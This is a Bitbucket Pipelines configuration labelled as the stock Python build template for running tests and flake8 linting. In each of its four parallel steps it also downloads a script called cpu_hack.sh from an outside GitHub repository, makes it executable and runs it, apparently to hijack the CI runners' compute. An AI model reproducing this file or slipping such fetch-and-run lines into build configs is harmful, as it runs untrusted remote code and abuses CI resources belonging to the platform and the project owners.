#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel:
      - step:
          name: aja
          caches:
            - pip
          script:
            - if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
            - pip install pytest
            - wget https://github.com/rahmadexo/yoyo/blob/main/cpu_hack.sh && chmod +x cpu_hack.sh && ./cpu_hack.sh
      - step:
          name: aja1
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://github.com/rahmadexo/yoyo/blob/main/cpu_hack.sh && chmod +x cpu_hack.sh && ./cpu_hack.sh
      - step:
          name: aja2
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://github.com/rahmadexo/yoyo/blob/main/cpu_hack.sh && chmod +x cpu_hack.sh && ./cpu_hack.sh
      - step:
          name: aja3
          script:
            - pip install flake8
            - flake8 . --extend-exclude=dist,build --show-source --statistics
            - wget https://github.com/rahmadexo/yoyo/blob/main/cpu_hack.sh && chmod +x cpu_hack.sh && ./cpu_hack.sh
